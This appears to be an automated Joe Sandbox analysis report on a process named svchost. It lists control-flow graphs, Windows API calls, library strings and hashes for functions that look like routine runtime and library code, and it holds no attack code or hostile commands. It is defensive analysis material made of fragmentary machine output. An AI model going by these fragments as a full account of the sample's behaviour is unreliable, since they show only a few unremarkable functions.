            control_flow_graph 1135 7ffa4187a908-7ffa4187a92e 1136 7ffa4187a930-7ffa4187a944 call 7ffa41866644 call 7ffa41866668 1135->1136 1137 7ffa4187a949-7ffa4187a94d 1135->1137 1151 7ffa4187ad4c 1136->1151 1139 7ffa4187ad35-7ffa4187ad41 call 7ffa41866644 call 7ffa41866668 1137->1139 1140 7ffa4187a953-7ffa4187a95a 1137->1140 1157 7ffa4187ad47 call 7ffa41866cf8 1139->1157 1140->1139 1143 7ffa4187a960-7ffa4187a98e 1140->1143 1143->1139 1145 7ffa4187a994-7ffa4187a99b 1143->1145 1149 7ffa4187a99d-7ffa4187a9af call 7ffa41866644 call 7ffa41866668 1145->1149 1150 7ffa4187a9b4-7ffa4187a9b7 1145->1150 1149->1157 1154 7ffa4187ad31-7ffa4187ad33 1150->1154 1155 7ffa4187a9bd-7ffa4187a9c3 1150->1155 1156 7ffa4187ad4f-7ffa4187ad66 1151->1156 1154->1156 1155->1154 1159 7ffa4187a9c9-7ffa4187a9cc 1155->1159 1157->1151 1159->1149 1160 7ffa4187a9ce-7ffa4187a9f3 1159->1160 1163 7ffa4187aa26-7ffa4187aa2d 1160->1163 1164 7ffa4187a9f5-7ffa4187a9f7 1160->1164 1168 7ffa4187aa2f-7ffa4187aa3b call 7ffa418728d0 1163->1168 1169 7ffa4187aa02-7ffa4187aa19 call 7ffa41866644 call 7ffa41866668 call 7ffa41866cf8 1163->1169 1166 7ffa4187aa1e-7ffa4187aa24 1164->1166 1167 7ffa4187a9f9-7ffa4187aa00 1164->1167 1171 7ffa4187aaa4-7ffa4187aabb 1166->1171 1167->1166 1167->1169 1176 7ffa4187aa40-7ffa4187aa57 call 7ffa41872870 * 2 1168->1176 1200 7ffa4187abb7 1169->1200 1174 7ffa4187aabd-7ffa4187aac5 1171->1174 1175 7ffa4187ab36-7ffa4187ab44 call 7ffa418836cc 1171->1175 1174->1175 1179 7ffa4187aac7-7ffa4187aac9 1174->1179 1187 7ffa4187ab4a-7ffa4187ab5f 1175->1187 1188 7ffa4187abd5 1175->1188 1196 7ffa4187aa59-7ffa4187aa6f call 7ffa41866668 call 7ffa41866644 1176->1196 1197 7ffa4187aa74-7ffa4187aa9f call 7ffa4187afdc 1176->1197 1179->1175 1184 7ffa4187aacb-7ffa4187aae1 1179->1184 1184->1175 1189 7ffa4187aae3-7ffa4187aaef 1184->1189 1187->1188 1194 7ffa4187ab61-7ffa4187ab73 GetConsoleMode 1187->1194 1192 7ffa4187abda-7ffa4187ac01 ReadFile 1188->1192 1189->1175 1190 7ffa4187aaf1-7ffa4187aaf3 1189->1190 1190->1175 1195 7ffa4187aaf5-7ffa4187ab0d 1190->1195 1198 7ffa4187acfb-7ffa4187ad04 GetLastError 1192->1198 1199 7ffa4187ac07-7ffa4187ac0f 1192->1199 1194->1188 1201 7ffa4187ab75-7ffa4187ab7d 1194->1201 1195->1175 1203 7ffa4187ab0f-7ffa4187ab1b 1195->1203 1196->1200 1197->1171 1208 7ffa4187ad21-7ffa4187ad24 1198->1208 1209 7ffa4187ad06-7ffa4187ad1c call 7ffa41866668 call 7ffa41866644 1198->1209 1199->1198 1205 7ffa4187ac15 1199->1205 1202 7ffa4187abba-7ffa4187abc4 call 7ffa41872870 1200->1202 1201->1192 1207 7ffa4187ab7f-7ffa4187aba8 ReadConsoleW 1201->1207 1202->1156 1203->1175 1211 7ffa4187ab1d-7ffa4187ab1f 1203->1211 1215 7ffa4187ac1c-7ffa4187ac31 1205->1215 1217 7ffa4187abaa GetLastError 1207->1217 1218 7ffa4187abc9-7ffa4187abd3 1207->1218 1213 7ffa4187abb0-7ffa4187abb2 call 7ffa418665f8 1208->1213 1214 7ffa4187ad2a-7ffa4187ad2c 1208->1214 1209->1200 1211->1175 1222 7ffa4187ab21-7ffa4187ab31 1211->1222 1213->1200 1214->1202 1215->1202 1224 7ffa4187ac33-7ffa4187ac3e 1215->1224 1217->1213 1218->1215 1222->1175 1228 7ffa4187ac40-7ffa4187ac59 call 7ffa4187a4b8 1224->1228 1229 7ffa4187ac65-7ffa4187ac6d 1224->1229 1235 7ffa4187ac5e-7ffa4187ac60 1228->1235 1232 7ffa4187ac6f-7ffa4187ac81 1229->1232 1233 7ffa4187ace9-7ffa4187acf6 call 7ffa4187a2bc 1229->1233 1236 7ffa4187acdc-7ffa4187ace4 1232->1236 1237 7ffa4187ac83 1232->1237 1233->1235 1235->1202 1236->1202 1238 7ffa4187ac88-7ffa4187ac8f 1237->1238 1240 7ffa4187ac91-7ffa4187ac95 1238->1240 1241 7ffa4187accb-7ffa4187acd6 1238->1241 1242 7ffa4187acb1 1240->1242 1243 7ffa4187ac97-7ffa4187ac9e 1240->1243 1241->1236 1245 7ffa4187acb7-7ffa4187acc7 1242->1245 1243->1242 1244 7ffa4187aca0-7ffa4187aca4 1243->1244 1244->1242 1246 7ffa4187aca6-7ffa4187acaf 1244->1246 1245->1238 1247 7ffa4187acc9 1245->1247 1246->1245 1247->1236
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: f408d6ea601487ca8bb2a4233b895732b2e3cf47cf663254ea7c56b9dcd8a684
            • Instruction ID: 868b628e45380285719cc99e7b15acc4a1a868070a448a256d2be3839ffcd2ca
            • Opcode Fuzzy Hash: f408d6ea601487ca8bb2a4233b895732b2e3cf47cf663254ea7c56b9dcd8a684
            • Instruction Fuzzy Hash: 1EC1D32A90C68656E763AB1598402BE7BE1EF92B84F59C135EA6D033B1DF7CF845C301
            Function 00007FFA417F6AFB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 137COMMON
            Download Yara Rule

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: !ref_stack.empty()$C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$object separator$ref_stack.back()->is_object()
            • API String ID: 0-2909628094
            • Opcode ID: c6f28a43094067e568919aeebe65e85ed8f6b1c1df78dfaeb86bacc5d7e77b82
            • Instruction ID: a54dfdd23826c46402e826ddbf743d8e86e91ecb93591716a855fd541d504f6d
            • Opcode Fuzzy Hash: c6f28a43094067e568919aeebe65e85ed8f6b1c1df78dfaeb86bacc5d7e77b82
            • Instruction Fuzzy Hash: 26519522A1CA4295EB13FF24D4911EE6371FB82398F808132EA4E875B7DF6CE545C744
            Function 64941AC0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1307 64941ac0-64941ad4 call 64948890 1309 64941ad9-64941ae4 calloc 1307->1309 1310 64941b85-64941b8c 1309->1310 1311 64941aea-64941b49 CreateSemaphoreA * 2 1309->1311 1312 64941b9d-64941ba0 1311->1312 1313 64941b4b-64941b4e 1311->1313 1314 64941ba2-64941ba5 CloseHandle 1312->1314 1315 64941bab-64941bc6 call 64948878 1312->1315 1316 64941b90-64941b96 CloseHandle 1313->1316 1317 64941b50-64941b82 InitializeCriticalSection * 3 1313->1317 1314->1315 1316->1312 1317->1310
            APIs
            • CreateSemaphoreA.KERNEL32 ref: 64941B20
            • CreateSemaphoreA.KERNEL32 ref: 64941B36
            • InitializeCriticalSection.KERNEL32 ref: 64941B5B
            • InitializeCriticalSection.KERNEL32 ref: 64941B61
            • InitializeCriticalSection.KERNEL32 ref: 64941B67
            • CloseHandle.KERNEL32 ref: 64941B90
            • CloseHandle.KERNEL32 ref: 64941BA5
            Memory Dump Source
            • Source File: 0000002E.00000002.2304875206.0000000064941000.00000020.00000001.01000000.0000001C.sdmp, Offset: 64940000, based on PE: true
            • Associated: 0000002E.00000002.2304680298.0000000064940000.00000002.00000001.01000000.0000001C.sdmpDownload File
            • Associated: 0000002E.00000002.2305579458.000000006494A000.00000002.00000001.01000000.0000001C.sdmpDownload File
            • Associated: 0000002E.00000002.2306040828.000000006494E000.00000002.00000001.01000000.0000001C.sdmpDownload File
            • Associated: 0000002E.00000002.2306329817.0000000064950000.00000004.00000001.01000000.0000001C.sdmpDownload File
            • Associated: 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_64940000_svchost.jbxd
            Similarity
            • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
            • String ID:
            • API String ID: 3487344249-0
            • Opcode ID: 3164d73ad481d2ab7239b497fcccb8682ab96046db25085a8fe4e562c5e92754
            • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
            • Opcode Fuzzy Hash: 3164d73ad481d2ab7239b497fcccb8682ab96046db25085a8fe4e562c5e92754
            • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750
            Function 00007FFA2CF02E10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetLastError.KERNEL32(?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF02E24
              • Part of subcall function 00007FFA2CF0C3B0: Sleep.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C3D2
              • Part of subcall function 00007FFA2CF0C3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C3F0
              • Part of subcall function 00007FFA2CF0C3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFA2CF02E38,?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF0C406
            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFA2CF02C5E,?,?,?,00007FFA2CEF1068), ref: 00007FFA2CF02E4A
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
            • String ID: /share/locale$PGLOCALEDIR$libpq-16
            • API String ID: 4109591470-900106006
            • Opcode ID: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
            • Instruction ID: 69266db4023c9a827fdd7eabbb873cb54820f5dc281d17bcdd415bb306bc1601
            • Opcode Fuzzy Hash: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
            • Instruction Fuzzy Hash: B9014B10F08BC3A1FA189B10AC911B527A0BF57724F849035D54EA32A6EF6CA7499770
            Function 00007FFA41879284 Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1331 7ffa41879284-7ffa418792a9 1332 7ffa418795a0 1331->1332 1333 7ffa418792af-7ffa418792b2 1331->1333 1334 7ffa418795a2-7ffa418795b2 1332->1334 1335 7ffa418792eb-7ffa41879313 1333->1335 1336 7ffa418792b4-7ffa418792e6 call 7ffa41866c40 1333->1336 1338 7ffa4187931e-7ffa41879324 1335->1338 1339 7ffa41879315-7ffa4187931c 1335->1339 1336->1334 1341 7ffa41879326-7ffa4187932f call 7ffa4187b078 1338->1341 1342 7ffa41879334-7ffa4187934b call 7ffa418836cc 1338->1342 1339->1336 1339->1338 1341->1342 1346 7ffa41879351-7ffa4187935a 1342->1346 1347 7ffa4187946c-7ffa41879486 1342->1347 1346->1347 1348 7ffa41879360-7ffa41879363 1346->1348 1349 7ffa418794dd-7ffa41879502 WriteFile 1347->1349 1350 7ffa41879488-7ffa4187948e 1347->1350 1353 7ffa41879376-7ffa41879381 1348->1353 1354 7ffa41879365-7ffa4187936f call 7ffa418656b0 1348->1354 1355 7ffa4187950d 1349->1355 1356 7ffa41879504-7ffa4187950a GetLastError 1349->1356 1351 7ffa41879490-7ffa41879493 1350->1351 1352 7ffa418794c6-7ffa418794d8 call 7ffa41878d34 1350->1352 1357 7ffa41879495-7ffa41879498 1351->1357 1358 7ffa418794b2-7ffa418794c4 call 7ffa41878f58 1351->1358 1379 7ffa41879459-7ffa41879460 1352->1379 1360 7ffa41879383-7ffa4187938c 1353->1360 1361 7ffa41879392-7ffa418793aa GetConsoleMode 1353->1361 1354->1353 1363 7ffa41879510 1355->1363 1356->1355 1364 7ffa41879521-7ffa4187952b 1357->1364 1365 7ffa4187949e-7ffa418794b0 call 7ffa41878e3c 1357->1365 1358->1379 1360->1347 1360->1361 1368 7ffa418793b0-7ffa418793b6 1361->1368 1369 7ffa41879465 1361->1369 1371 7ffa41879515 1363->1371 1373 7ffa4187952d-7ffa41879532 1364->1373 1374 7ffa41879599-7ffa4187959e 1364->1374 1365->1379 1377 7ffa418793bc-7ffa418793bf 1368->1377 1378 7ffa41879442-7ffa41879454 call 7ffa418788a0 1368->1378 1369->1347 1372 7ffa4187951a 1371->1372 1372->1364 1380 7ffa41879560-7ffa4187957a 1373->1380 1381 7ffa41879534-7ffa41879537 1373->1381 1374->1334 1384 7ffa418793c1-7ffa418793c4 1377->1384 1385 7ffa418793ca-7ffa418793d8 1377->1385 1378->1379 1379->1371 1388 7ffa41879581-7ffa41879590 1380->1388 1389 7ffa4187957c-7ffa4187957f 1380->1389 1386 7ffa41879550-7ffa4187955b call 7ffa41866620 1381->1386 1387 7ffa41879539-7ffa41879548 1381->1387 1384->1372 1384->1385 1385->1363 1390 7ffa418793de 1385->1390 1386->1380 1387->1386 1388->1374 1389->1332 1389->1388 1392 7ffa418793e2-7ffa418793f9 call 7ffa41883f4c 1390->1392 1396 7ffa418793fb-7ffa41879407 1392->1396 1397 7ffa41879434-7ffa4187943d GetLastError 1392->1397 1398 7ffa41879409-7ffa4187941b call 7ffa41883f4c 1396->1398 1399 7ffa41879426-7ffa4187942d 1396->1399 1397->1363 1398->1397 1403 7ffa4187941d-7ffa41879424 1398->1403 1399->1392 1401 7ffa4187942f 1399->1401 1401->1363 1403->1399
            APIs
            • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFA41886B11,?,00007FFA41851C75,?), ref: 00007FFA418793A2
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleMode
            • String ID:
            • API String ID: 4145635619-0
            • Opcode ID: 0191dd56cb59d05cb8921a4798d09492ac6c02315033d51c4726e76e93e8fde7
            • Instruction ID: cb268e878fbd0a1bf649f45194e1b1c5ff65d1c1e709db29086fd0761791ec96
            • Opcode Fuzzy Hash: 0191dd56cb59d05cb8921a4798d09492ac6c02315033d51c4726e76e93e8fde7
            • Instruction Fuzzy Hash: 8A91D532E1C65285FB53EB6598803BD2BE0BB46BA8F449136DE1E636A5DF38F445C300
            Function 00007FFA417C53F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMONLIBRARYCODE
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: x{}
            • API String ID: 0-1205620038
            • Opcode ID: 57a5ebe335d81e930eaf620cfff9ecf289f9037de4ff7bf7f93a382b119c3dc1
            • Instruction ID: 56b20333414e4413eb22751a831ca8fc4e28ec84c724983ecebd9e776972c9bc
            • Opcode Fuzzy Hash: 57a5ebe335d81e930eaf620cfff9ecf289f9037de4ff7bf7f93a382b119c3dc1
            • Instruction Fuzzy Hash: 9A51EB32B0D741C5EB27AB15F4413B9A261EB8A394F548235EA9D477E7EF7CE1428700
            Function 00007FFA4186914C Relevance: 3.2, APIs: 2, Instructions: 181COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: e1134cc1dad0db26aa2db931487d3556eaa9b00c28f43be0c2844432063eeed9
            • Instruction ID: bba970deb28ee83b6a2cbb63b76912d00b3bd27c4e70c75fc463b3c02aef43f8
            • Opcode Fuzzy Hash: e1134cc1dad0db26aa2db931487d3556eaa9b00c28f43be0c2844432063eeed9
            • Instruction Fuzzy Hash: FB51D221F0D5828AFB6BAF6A950077A6691AF87BA4F94D234DD2D577E5CE3CF4004600
            Function 00007FFA417E5300 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d932aa7ae23578de4649594ddc4564af2b2b562f32a4ffcaab1a3f7d025f2311
            • Instruction ID: a68d7c44ae8cc5306669ac41ea6364588e8fa3b1568998d568f4d792ae9da899
            • Opcode Fuzzy Hash: d932aa7ae23578de4649594ddc4564af2b2b562f32a4ffcaab1a3f7d025f2311
            • Instruction Fuzzy Hash: A141B336B09B5985EB53AF2AD44037C63A1FB45FD8F548432DE0D17BA9DE38D8468704
            Function 00007FFA41871068 Relevance: 3.1, APIs: 2, Instructions: 76COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFA41862A56,?,?,?,00007FFA41866C2E), ref: 00007FFA4187108E
            • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA418710F1
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
            • String ID:
            • API String ID: 1808705829-0
            • Opcode ID: 787efea584088b6d6b9ca6d6dcf9c9c55a389264e7c1f3a561f889cd0549ea99
            • Instruction ID: cf894c42bb6c34521393d162ae169a18161f6fc24bec0ec446ee50f1e79cea83
            • Opcode Fuzzy Hash: 787efea584088b6d6b9ca6d6dcf9c9c55a389264e7c1f3a561f889cd0549ea99
            • Instruction Fuzzy Hash: 20319021F1C68281FB63BB51A80137962E1AF87B84F54C035DA5D47AB6CF3CF8008711
            Function 00007FFA41879820 Relevance: 3.1, APIs: 2, Instructions: 59COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ChangeCloseErrorFindLastNotification
            • String ID:
            • API String ID: 1687624791-0
            • Opcode ID: 3e2a093233af3cc0de44823494553dbac82f4697178b8f79bf05f0434f475961
            • Instruction ID: 8f487b5c75a11104c13f5b1d12c6190a95a3c9883623e2dac46fd913e24a7096
            • Opcode Fuzzy Hash: 3e2a093233af3cc0de44823494553dbac82f4697178b8f79bf05f0434f475961
            • Instruction Fuzzy Hash: DF218E61F1C68281EB577721A98037912C19F867B4F08C235EA3E877E2DE7CF4408301
            Function 00007FFA4187AE88 Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileLastPointer
            • String ID:
            • API String ID: 2976181284-0
            • Opcode ID: 5f3265697be2019f68afacfcc20b245da58e981e5470f7d53b5fd53093734ee7
            • Instruction ID: 6fb17013a1f8baaefa03c43e614f23f92ae6124ea7c323c076fdd0e3a5ae242e
            • Opcode Fuzzy Hash: 5f3265697be2019f68afacfcc20b245da58e981e5470f7d53b5fd53093734ee7
            • Instruction Fuzzy Hash: C811046671CB8181DB12AB25E80426963A1FB46BF4F588731EE7D477E9DF7CE0408740
            Function 00007FFA418518D8 Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task
            • String ID:
            • API String ID: 118556049-0
            • Opcode ID: bb86bc8f5b42b066b5a2a18e08009b1d73abb50dc37e3bee3864d8c61a03a92c
            • Instruction ID: 3e5966c62141cf45b2b2aa7a6f07cbc8f84a8163c5e0d65f9278d54d3b1f0086
            • Opcode Fuzzy Hash: bb86bc8f5b42b066b5a2a18e08009b1d73abb50dc37e3bee3864d8c61a03a92c
